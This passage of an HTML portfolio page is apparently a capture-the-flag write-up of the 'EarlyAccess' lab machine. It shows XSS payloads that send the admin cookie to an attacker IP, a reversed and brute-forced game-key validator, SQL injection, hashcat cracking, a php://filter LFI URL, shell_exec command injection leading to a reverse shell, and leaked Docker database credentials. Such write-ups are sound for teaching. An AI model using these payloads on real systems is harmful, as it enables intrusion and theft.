          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
